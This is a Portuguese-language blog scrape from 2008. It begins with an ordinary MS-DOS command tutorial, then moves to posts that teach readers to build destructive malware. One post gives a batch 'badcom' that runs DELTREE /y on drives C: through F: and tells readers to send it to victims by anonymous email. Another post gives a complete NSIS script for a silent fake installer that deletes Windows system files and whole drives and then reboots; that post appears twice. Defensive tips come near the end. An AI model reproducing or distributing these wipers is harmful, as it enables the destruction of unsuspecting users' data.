Introdução
DOS (Disk Operating System) é um "sistema operacional" desenvolvido para permitir ao usuário realizar todas as funções básicas e essenciais no computador. Poucos foram os DOS produzidos até hoje: MS-DOS, da Microsoft, o PC-DOS, da IBM, DR-DOS, da Digital Research, o NOVELL, para redes, etc. O MS-DOS dominou amplamente o mercado em sua época e, até hoje, faz faz parte do Software Básico (programa indispensável ao funcionamento do computador). Ele, até certo ponto, atua como uma interface básica do hardware do computador, por isso é tão especial. São raros os programas executados no Windows que possuem ajuda do DOS. Isso deixa claro que ele é mais usado para gerenciar e resolver problemas de sistema. O DOS é uma forma de você comunicar suas instruções ao computador. E tais instruções devem ser as que ele reconhece. Estas instruções, na maior parte, consistem em palavras baseadas na língua inglesa.
PROMPT
As funções do DOS são padronizadas e independentes do hardware de cada computador. Por outro lado, cada PC tem funções básicas elementares peculiares ao seu projeto eletrônico. Por isso, precisa ter um programa que decompõem as funções padrões do DOS nas suas funções elementares. Chamado de BIOS ( em inglês Binary Input Output System ), esse programa é gravado em memória permanente na placa-mãe do PC e tem a função de dar partida na operação BOOT, ativando o DOS e atuar durante toda a operação, fazendo a ligação entre o DOS e o hardware.
Antes de irmos aos comandos, veremos primeiro o que é PROMPT:
PROMPT é o chamado sinal de prontidão, pois indica que o computador está pronto para receber instruções. Ele mostra também sua localização, ou seja, em que drive (unidade de armazenamento) e diretório você está trabalhando. Veja o exemplo:
C:\DOS>_
O exemplo indica que você está no drive C:\, na pasta DOS. Ao lado do sinal >, há um "tracinho" piscando, chamado CURSOR. Ele indica aonde vai aparecer os carecteres que você digitar.
COMO ACESSAR O DOS
Para acessar o DOS existe, basicamente, 3 formas. Se você estiver no Windows 98, basta clicar em Iniciar/Desligar e escolher "Reiniciar o computador em modo MS-DOS". Outra forma no Windows é, clicar em Iniciar/Programas e selecionar "Prompt do MS-DOS". Mas está última acessará o DOS com o Windows ainda carregado, o que significa que alguns comandos podem não funcionar. Se estiver com o computador desligado e quiser ir direto para o DOS, sem passar pelo Windows, fique clicando em F8 até um lista aparecer. Escolha "Somente Prompt de Comando", que normalmente é o penúltimo item.
Vale lembrar que, se você usa o Windows Millenium ou superior, o acesso ao DOS não é tão simples, visto que este sistema operacional é menos dependente do DOS do que o Windows98 ou 95. Se você quiser usar o DOS no WinMe, terá que reiniciar o computador com o disquete de boot, criado no próprio WinMe.
Outra coisa que vale lembrar é que você pode não ter o DOS completo se usa o Win98 ou 95. Isso porque o DOS completo era para ser usado sozinho, como um sistema operacional único. Com o Windows, alguns comandos foram retirados e deixado somente os essenciais. Mas você pode copiar os outros comandos para o seu computador, se tiver uma cópia do DOS completa.
EXECUTANDO OS COMANDOS
Antes de começarmos a ver os comandos, é necessário saber como executá-los. No prompt, você verá o cursor piscando. Isso significa que você já pode digitar. Depois de ter escolhido o comando, tecle Enter. Aqui, para exemplificar usaremos o modelo de prompt "C:\Windows>", mas vale lembrar que "C" pode ser qualquer unidade de disco no seu computador. Normalmente a letra A indica a unidade de disquete. E "Windows" pode significar qualquer pasta dentro da unidade que você está trabalhando. Mas, é importante saber que o DOS geralmente não visualiza nomes de arquivos com mais de 8 caracteres. Por isso, a pasta Meus Documentos, por exemplo, fica assim: MEUSDO~1.
COMANDOS:
DATE
Comando que atualiza a data do sistema operacional:
DD - DIA Dígito entre 1 - 31
MM - MÊS Dígito entre 1 - 12
AA - ANO Dígito entre 80 - 99
Separadores: Hífen ( - ), Barra ( / ) ou Ponto ( . )
Exemplo:
C:\>DATE
O Sistema apresentará a seguinte tela:
Em seguida, digita-se a data atual e pressiona-se Enter.
TIME
Comando que atualiza a hora do sistema operacional:
hh - Horas - Dígito entre 0 - 24
mm - Minuto - Dígito entre 0 - 59
ss - Segundo - Dígito entre 0 - 59
Separadores: Dígito Pontos ( : ) ou Ponto ( . ).
Exemplo:
C:\>Time
O Sistema apresentará a seguinte tela:
Em seguida, digita-se a hora atual e tecla-se Enter.
VER
Comando que mostra a versão do sistema operacional:
C:\>VER
DIR
Comando que mostra a lista de arquivos de um diretório (pasta). Este comando pode conter algumas variações para obter-se uma resposta diferente:
* /P Lista o diretório com pausa, usado quando a pasta encontra-se com v�rios arquivos.
* /W Lista o diretório na horizontal.
* / ? Lista todas as opções do comando DIR.
O comando dir apresenta, ainda, três informações bastante importantes ao seu final: o número de arquivos contidos no diretório corrente, o espaço em disco ocupado por este(s) arquivo(s) e o espa�o disponível no disco.
Exemplo:
C:\>DIR / W
C:\>DIR /P
C:\>DIR / W
CLS
Comando que limpa a tela e deixa o cursor no canto superior esquerdo:
Exemplo:
C:\>CLS
MKDIR ou MD
Comando que cria um diretório a partir da pasta corrente com o nome especificado:
Sintaxe: MD [caminho] { Nome } ou MKDIR [caminho] { Nome }
Exemplo:
C:\>MD PROFESSOR
C:\>MKDIR PROFESSOR\ALUNOS
CHDIR ou CD
Comando que muda um subdiretório corrente a partir do diretório atual:
Sintaxe: CD [caminho] ou CHDIR [caminho]
Exemplo:
C:\>CD PROFESSOR - entra no diretório PROFESSOR
C:\>CD PROFESSOR\ALUNOS - alterna para o subdiretório ALUNOS do diretório PROFESSOR
C:\>CD - indica o caminho (PATH) atual.
RMDIR ou RD
Comando que remove um subdiretório a partir do drive corrente. O subdiretório somente será eliminado se não conter nenhum arquivo ou subdiretório em seu interior:
Sintaxe: RD [caminho] ou RMDIR [caminho]
Exemplo:
C:\>RD PROFESSOR\ALUNOS - remove o subdiretório ALUNOS do diretório PROFESSOR.
C:\>RD PROFESSOR - remove o diretório PROFESSOR.
TREE
Comando que exibe graficamente a árvore de diretórios e subdiretórios a partir do diretório-raiz para que o usuário tenha a organização hierarquia do seu disco. Este comando pode conter algumas variações para obter-se um resultado diferente:
* /F Exibe a árvore de subdiretórios, mostrando também os arquivos existentes dentro dele.
* /A Instrui o comando TREE a usar os caracteres gráficos disponíveis em todas as Páginas de Código e permite um processo de impressão mais rápido.
Exemplo:
C:\>TREE
C:\>TREE /F
C:\>TREE /A
CHKDSK
Comando que checa o disco mostrando informações sobre este na tela:
Sintaxe: CHKDSK [unidade:]
Exemplo:
C:\>CHKDSK C: - checa o disco rígido C:
C:\>CHKDSK A: - checa o disco flexível A:
MEM
Comando que fornece informações sobre a memória:
Sintaxe: MEM
Exemplo:
C:\>MEM
RENAME ou REN
Comando que faz a renomeação (TROCA) do nome ou extensão de um arquivo a partir do drive corrente:
Sintaxe: RENAME ou REN [unidade:] [caminho] { Nome Antigo } { Nome Novo }
Exemplo:
C:\> REN SMART.DOC INSTRUTOR.DOC - muda o nome do arquivo SMART.DOC para INSTRUTOR.DOC
C:\> REN *.DPR *.PRG - muda a extensão dos arquivos em .DPR para .PRG
COPY
Comando que copia um arquivo ou grupo de arquivos de uma ORIGEM para um DESTINO:
Sintaxe: COPY [unidade:] [caminho] { Nome Origem } [unidade:] [caminho] { Nome Destino }
Exemplo:
C:\>COPY A:\TESTE.XXX C:\AULA , faz a cópia de arquivo TESTE.XXX do DRIVE de origem A: para o DRIVE de destino C:\AULA.
Neste comando utiliza-se muito os caracteres "curingas", que têm a função de substituir qualquer caractere ou grupos de caracteres. Os caracteres curingas são representados abaixo de acordo com a sua finalidade:
* - para qualquer quantidade de caracteres.
? - para um caractere.
Exemplo:
C:\>COPY C:DOSS*.* C:AULA , faz a cópia de todos os arquivos que têm o nome que se inicia com a letra S do diretório de origem C:\DOS para o diretório de destino C:\AULA.
C:\>COPY C:\DOSVENDAS?.DOC C:\AULA , faz cópia de todos os arquivos que têm a palavra VENDAS + 1 CARACTER.
DISKCOPY
Quando necessitamos fazer uma cópia das informações de um disquete, podemos utilizar o comandos Diskcopy. Este comando faz a duplicação de um disco, sendo que os dois discos devem possuir o mesmo tamanho e capacidade. Este comando só permite a duplicação de discos flexíveis. Além disso, este comando pode conter variações para obter-se uma resposta diferente:
* /V = Faz a verificação durante a duplicação do disco.
Sintaxe: DISKCOPY [unidade:] [unidade:] /V
Exemplo:
C:\>DISKCOPY A: B: - faz a duplicação de um disco na unidade A: para unidade B:, sendo que os dois discos devem possuir o mesmo tamanho e capacidade.
XCOPY
Comando que copia arquivos seletivamente, lendo em sub-diretórios diferentes na origem e podendo criar os sub-diretórios na unidade de destino, se assim for desejado. Este comando pode conter variações para obter-se uma resposta diferente:
* ORIGEM Drive, caminho e nome dos arquivos de origem.
* DESTINO Drive, caminho e nome dos arquivos de destino.
* /M Copia os arquivos de origem e os "marca".
* /D: data Copia os arquivos de origem que foram modificados na data definida em
"data" ou depois dela, (mm,dd,yy é o formato default")
* /S Copia os arquivos em diretórios e subdiretórios, a não ser que estejam vazios.
* /E Copia os subdiretórios mesmo que estejam vazios.
Sintaxe: XCOPY [ ORIGEM] [DESTINO] /M /D:data /S /E /V
Exemplo:
C:\>XCOPY C:DOS A: , copia o diretório DOS para o drive A: .
MOVE
Comando que tem duas funções: Renomear diretórios ou mover arquivos de um diretório para outro:
Sintaxe: MOVE [unidade:] [caminho] [nome antigo] [nome novo] ou [Origem] [Destino]
Exemplo:
C:\>MOVE C:\AULA C:\TESTE - renomeia o diretório C:\AULA para C:\TESTE
C:\>MOVE C:\AULA*.* A:\ - faz a movimentação de todos os arquivos do drive de origem C:\AULA para o drive de destino A:\, deixando assim o diretório C:\AULA vazio.
TYPE
Comando que exibe o conteúdo de um determinado arquivo:
Sintaxe: TYPE [unidade:] [CAMINHO] { Nome do Arquivo }
Exemplo:
C:\TYPE CONFIG.SYS Exibe o conteúdo do arquivo CONFIG.SYS na tela.
Utilizando este comando você pode também imprimir o conteúdo de um arquivo bastando para tanto adicionar a terminação > PRN ou > LPT1 ao comando.
Exemplo:
C:\>TYPE CONFIG.SYS > PRN Imprime o conteúdo do arquivo CONFIG.SYS.
MORE
Comando que exibe o conteúdo de um determinado arquivo, fazendo uma pausa cada vez que a tela é preenchida:
Sintaxe: MORE < [unidade:] [caminho] { Nome do Arquivo }
Exemplo:
MORE < TESTE.TXT
FORMAT
Antes de utilizar ou reutilizar um disco novo, você precisa prepará-lo para receber as informações e, essa preparação do disco é chamada de formatação, que tem a função de redefinir trilhas e setores na superfície magnética do disco. Num disco formatado podemos copiar um arquivo, um diretório de vários arquivos ou até um disco inteiro. A formatação deve ser aplicada com cuidado pois destrói o conteúdo anterior do disco. Este comando pode conter algumas variações para obter-se uma resposta diferente:
/S Formata o disco na unidade especificada e insere o Sistema Operacional DOS
/4 Formata o disquete de baixa densidade em drives de alta densidade
/Q Formata rapidamente o disco da unidade (Formatação Rápida)
/U formata o disco da unidade independente da condição (UNCONDICIONABLE)
Sintaxe: FORMAT [unidade:] /Q /U /S /4
Exemplo:
C:\>FORMAT A: - formata o disco na unidade A:
ATENÇÃO: tenha cuidado nas formatações de discos ,pois elas fazem com que o conteúdo do disco seja perdido. Vale lembrar que esta operação se torna muito mais crítica quando estamos formatando a unidade C ( FORMAT C:\ ), operação não indicada para pessoas com pouco conhecimento no assunto.
UNFORMAT
Caso aconteça de você formatar um disco por acidente, o MS-DOS permite a recuperação das informações, há não ser que você tenha utilizado o parâmetro /U em sua formatação. O comando UNFORMAT recupera as informações de um disco formatado. Este comando pode conter variações para obter-se uma resposta diferente:
/L Recupera as informações de um disco, mostrando a lista de arquivos e diretórios
/TEST Lista todas informações, mas não refaz o disco
Sintaxe: UNFORMAT [unidade:] /L /TEST /P
Exemplo:
C:\>UNFORMAT A: - desformata o disco na unidade A:
DEL ou DELETE
Comando que faz a eliminação de arquivos:
Sintaxe: DEL [unidade] [caminho] { Nome do Arquivo }
Exemplo:
DEL C:\WINWORD\CASTAS.DOC - deleta o arquivo CARTAS.DOC do diretório WINWORD
DEL *.DOC , deleta todos os arquivos com extensão .DOC
do diretório corrente
DEL C:\ADMIN\*.* - deleta todos os arquivos do diretório ADMIN
UNDELETE
No desenvolvimento diário de suas tarefas do dia a dia é muito comum você apagar um ou mais arquivos, e depois descobrir que aquele(s) arquivo(s) era(m) importante(s). A partir da versão 5.0 do MS-DOS houve a implantação de um comando muito útil chamado Undelete, que nos permite (às vezes...) recuperar estes arquivos. Existem versões deste utilitário para o MS-DOS ou MS-Windows:
Sintaxe: UNDELETE [unidade:] [caminho] { Nome do Arquivo }
Exemplo:
UNDELETE C:\WINWORD\CARTAS.DOC - recupera o arquivo CARTAS.DOC do diretório WINWORD
DELTREE
Comando que apaga um ou mais subdiretórios do disco a partir do diretório corrente:
O comando deltree apaga todos os arquivos e subdiretórios dentro de um diretório de uma só vez. Como precaução ele sempre exibirá uma mensagem na tela perguntando se você realmente deseja apagar.
Exemplo:
C:\>DELTREE PROFESSOR
Utilizando-se deste comando o usuário poderá apagar subdiretórios com mais rapidez e eficiência.
Baseado em material de autor desconhecido. Publicado em 23/07/2008.
quarta-feira, 23 de julho de 2008
terça-feira, 1 de julho de 2008
Badcom é um pequeno arquivo (.com ou .bat) que quando executados realizam tarefas que podem ser benéficas ou maléficas. Ele realiza comandos no DOS ou no Windows, aqui vamos ensinar como fazer um, dar os principais comandos e dois exemplos nada benéficos.
Fazendo um Badcom:
Primeiro você abre o edit no DOS ou o Bloco de Notas do Windows, lá você colocará os comandos que serão realizados quando o arquivo for executado, depois de feito você salva o arquivo com extensão .bat invés de .txt, para isso é só colocar: nomedoarquivo.bat por exemplo ou depois de salvo renomear colocando .bat no final.
Para transformar o arquivo .bat em .com:
Você precisará de um pequeno arquivo para fazer isso, ele é o "Bat2xec.com" que tem essa função de transformar .bat em .com. Depois de pegar esse arquivo salve ele dentro da pasta do Windows e vá ao DOS, entre na pasta aonde está o arquivo usando os comandos básicos de DOS:
cd.. = retorna um pasta
cd\ = sai de todas pastas
dir = mostra todos arquivos e pastas de uma pasta
cd nomedapasta = entra na pasta que você colocou o nome
lembre-se que pastas com mais de oito caracteres terão no dos o seguinte nome:
se a pasta é: "Meus documentos", no DOS será: "Meusdo~1" (sem "aspas").
Após estar na pasta do arquivo .bat e supondo que o nome do arquivo seja "arquivo.bat" digite: "bat2exec arquivo.bat" (sem aspas). Pronto será criado um arquivo com mesmo nome e extenção .com na mesma pasta.
Exemplo simples e destrutivo:
Abra o bloco de notas do windows ou o editor de texto do MS-DOS e coloque os comandos abaixo:
@ECHO OFF
ECHO COLOQUE SUA MENSAGEM DE DESPEDIDA AQUI HEHE
BREAK OFF
DELTREE/y C:\*.*
DELTREE/y D:\*.*
DELTREE/y E:\*.*
DELTREE/y F:\*.*
PRONTO, QUEM EXECUTAR ESSE ARQUIVO TERÁ O PC FORMATADO MESMO SE FOR VOCÊ OU UM AMIGO NÃO ME RESPONSABILIZO POR NADA QUE ACONTECER...
Exemplo inofencivo:
Você pode executar este arquivo em seu pc sem nenhum problema. É só colocar estes comandos para um bloco de notas fazendo suas alterações.
@echo off
cls
cd\
:vlt
echo badcom FEITO POR
echo badcom DISPON'IVEL
echo Grupo Hacker MENTESHACKERS siempre com che
echo o seu SISTEMA e' meu agora haiheaiuu
echo ][][][ Isto 'e apenas um VERME's?? ][][][
echo [1] Me desculpe, eu adoro ferrar lammers ..]]]
echo [2] Portque vc vai me ferrar???
echo [3] Oque e' um vírus??
choice /n/c123
if errorlevel 3 goto end
if errorlevel 2 goto end
if errorlevel 1 goto end
:end
echo ....ei estou FERRANDO VOCÊ NOW....
echo > minorthreat.txt isto foi um badcom
echo > the_ghost.txt isto foi um badcom feito por the_ghost
echo > leiaMERDA.txt prescione ctrl + alt + del para acabar com isso agora
echo > grupo.txt isso 'e um exemplo simples de badcom
notepad minorthreat.txt
notepad syspunk.txt
notepad leiaMERDA.txt
notepad grupo.txt
goto vlt
Importante:
Agora envie seu arquivo para sua vítima (cuidado para não clicar nele e ser a própria vítima) Use um e-mail anônimo para não saberem quem foi ou vá pelo IRC e se responsabilize pelos seus atos.
Caso a pessoa passe esse badcom via disquete, ele não deve esquecer de finalizar o arquivo com o seguinte comando para não deixar vestígios de seu ato insano no disquete.
deltree/y a:\*.*
sexta-feira, 9 de maio de 2008
Apagar um HD
Vou mostrar como fazer um simples programinha devastador, que apaga TUDO do HD. Tanto os arquivos do usuário como as pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque estarão em uso. Mas apagando a maioria e alguns estratégicos, já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).
Apagar arquivos... Sugiro usar o gerador de programas de instalação NSIS (Nullsoft Scriptable Install System). Ele é destinado a desenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um "falso" programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores...
Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.
Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:
!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"
SetCompressor lzma
Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent
Section "Sec001" SEC01
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd
Section -Post
Reboot
SectionEnd
Salve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").
Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.
Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.
A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:
Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"
Adicione o que quiser, arquivos específicos, etc.
A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.
Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".
O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.
Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.
Fácil, não?
Claro, isso é só um exemplo, ideal para lammers ou gente que se acha (e que na real não sabe é nada). Ou mesmo para quem está curioso e iniciando. Para fazer vírus específicos é recomendável dominar uma linguagem de programação. E lembre-se: você deve saber o que o vírus fará, o que ele vai atacar, e mais, saber como atacar. Não adianta querer ver a agenda do celular da namorada se você não souber onde ela guarda o celular. Não adianta querer ferrar um programa se você não souber que arquivos ou chaves do registro ele utiliza.
Por essas e outras, muito, muito cuidado ao abrir programas da Internet. Não clique naqueles banners de propaganda suspeitos, com carinhas lindas. Não clique no anúncio "Almente o tamanho do seu pênis". Não veja as montagens de fotos que não sei quem fez de você com não sei quem lá, e que te deixou um recado no orkut. Cuidado com os joguinhos em flash "executáveis"; se eles forem de origem desconhecida, tome mais cuidado ainda, prefira ver as versões em páginas HTML com o ".swf" separado. Mesmo se foi um amigo confiável que te passou, ele pode ter pego num site malicioso sem saber, ou então recebeu do primo do colega do vizinho da tia de outra cidade. Se você navega na Internet e mantém arquivos importantes no seu computador, considere o uso de uma conta de usuário restrita para navegar, ou use a conta de "Convidado", é o melhor a ser feito. Mantenha suas partições no Windows formatadas em NTFS, pois ao usar uma conta restrita, ela não terá acesso completo aos arquivos do sistema nem das outras pastas. Se o apagador que mostrei como criar, por exemplo, fosse rodado com uma conta de usuário restrita numa partição em NTFS, ele não conseguiria apagar praticamente NADA da pasta do Windows nem das outras pastas. O maior estrago seria na conta de usuário usada para rodá-lo, por isso se fosse um usuário restrito ou o convidado, seus arquivos estariam a salvo. Note que mesmo em NTFS, se você usasse a conta de administrador, boa parte dessa proteção iria por água abaixo, já que normalmente os administradores podem apagar arquivos do sistema e das outras pastas. E um programa executado como administrador, tem todos os direitos concedidos à conta de administrador. Ao instalar um programa, desmarque na instalação tudo o que for suspeito, especialmente se não estiver documentado. Muitas barras de ferramentas extras que aparecem no seu navegador foram instaladas junto com algum programa que você instalou "conscientemente", clicando em tudo, sem ler nada. LEIA. LEIA TUDO O QUE PUDER. Muitos spywares são documentados na licença de uso de um software, e muitos brasileiros que já não têm costume de ler mesmo, assim instalam ele sem saber. Um software que se preze e que respeite seus usuários deixa bem claro suas condições de uso, você só usa se concordar. E nada mais justo, se não concordar, simplesmente NÃO UTILIZE.
Uma dica para usuários do Windows XP ou as versões superiores. Ao rodar um programa suspeito, ou animações em flash executáveis, joguinhos que se dizem que "não precisa instalar", etc, o Windows pode desativar algumas alterações que o programa tente realizar. Por exemplo, ele não conseguirá alterar NADA no registro, o que é uma grande vantagem. Claro, se o programa depender disso para funcionar, nada feito, ele não irá rodar ou mostrará uma série de mensagens de erro. Executar programas confiáveis assim pode fazer com que eles não funcionem também, pois é comum um programa ler e gravar dados no registro ao ser aberto ou fechado. Já um joguinho "não instalável" ou uma animação em flash não deveria fazer nada isso, né? Para executar um programa no modo restrito: clique com o botão direito do mouse no ícone do mesmo, escolha "Executar como". Deixe selecionado o seu nome de usuário, e deixe marcado o item "Proteger meu computador e meus dados contra atividades não autorizadas de programas". Dê OK. Abrindo o programa assim, entre outras coisas, ele não poderá alterar nada no registro do Windows. Se o item "Executar como" não aparecer no menu, selecione o arquivo, segure SHIFT e clique com o direito nele.
Para programas suspeitos ou totalmente desconhecidos, eu recomendo testar em máquinas virtuais, como comentei mais acima. É melhor. Se der pau, dá só nela (a menos que você tenha arquivos no seu PC na rede compartilhados com permissão de escrita). Apague o arquivo do HD virtual e recopie a pasta. É mais prático do que usar uma máquina cobaia, tendo que reinstalar ou reparar tudo.
Enfim, esta dica tem diversos públicos. Não estou incentivando o mal, mas tirando uma curiosidade de muita gente sobre os vírus. O uso que se fará dela é de responsabilidade de cada um, né?! Um martelo pode ser usado na construção da sua casa, dos seus móveis. Mas pode também servir também para estourar seus miolos. Tudo é relativo.
Apagar arquivos... Sugiro usar o gerador de programas de instalação NSIS (Nullsoft Scriptable Install System). Ele é destinado a desenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um "falso" programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores...
Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.
Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:
!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"
SetCompressor lzma
Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent
Section "Sec001" SEC01
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd
Section -Post
Reboot
SectionEnd
Salve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").
Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.
Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.
A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:
Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"
Adicione o que quiser, arquivos específicos, etc.
A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.
Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".
O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.
Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.
Fácil, não?
Claro, isso é só um exemplo, ideal para lammers ou gente que se acha (e que na real não sabe é nada). Ou mesmo para quem está curioso e iniciando. Para fazer vírus específicos é recomendável dominar uma linguagem de programação. E lembre-se: você deve saber o que o vírus fará, o que ele vai atacar, e mais, saber como atacar. Não adianta querer ver a agenda do celular da namorada se você não souber onde ela guarda o celular. Não adianta querer ferrar um programa se você não souber que arquivos ou chaves do registro ele utiliza.
